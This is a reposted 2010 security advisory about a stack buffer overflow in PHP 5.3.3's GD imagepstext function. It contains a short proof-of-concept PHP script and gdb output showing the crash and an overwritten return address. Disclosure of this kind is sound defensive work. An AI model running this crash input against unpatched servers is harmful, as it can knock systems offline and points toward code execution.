PHP 5.3.3 GD Stack Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PHP 5.3.3 GD Stack Buffer Overflow

来源：http://secunia.com/ 作者：Secunia 发布时间：2010-12-13

Description:

Prior to version 5.3.4, PHP's GD extension did not properly validate
the number of anti-aliasing steps passed to the function imagepstext.
The value of this parameter is expected to be either 4 or 16. To
accommodate this, an array of 16 integers, aa, is located on the
stack. Before the number of steps is validated, it is used to populate
the array. This results in a stack-based buffer overflow.

Proof of concept:

<?php
$img = imagecreatetruecolor(1, 1); //Arbitrary
$fnt = imagepsloadfont("somefont.pfb"); //Arbitrary
//The final parameter is the number of anti-aliasing steps
imagepstext($img, "Testing", $fnt, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA,
0xAAAAAA, 0xAAAAAA, 0, 0, 0.0, 99999);
?>

Result in php 5.3.3 (with gdb):

sh-4.1$ php -v
PHP 5.3.3 (cli) (built: Jul 22 2010 15:37:02)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
sh-4.1$ gdb php
<trimmed>
(gdb) run imagepstext_poc.php
Starting program: /usr/bin/php imagepstext_poc.php
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,
    return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)
    at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257
4257			aa[i] = gdImageColorResolveAlpha(bg_img, rd, gr, bl, al);
Missing separate debuginfos, use: <trimmed>
(gdb) bt
#0  0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,
    return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)
    at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257
#1  0x00aaaaaa in ?? ()
#2  0x00aaaaaa in ?? ()
#3  0x00aaaaaa in ?? ()
#4  0x00aaaaaa in ?? ()
#5  0x00aaaaaa in ?? ()
<etc>

Result in php 5.3.4:

$ ./php-5.3.4 -v
PHP 5.3.4 (cli) (built: Dec 10 2010 10:26:40)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ ./php-5.3.4 imagepstext_poc.php

Warning: imagepstext(): AA steps must be 4 or 16 in
/home/.../imagepstext_poc.php on line 4

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告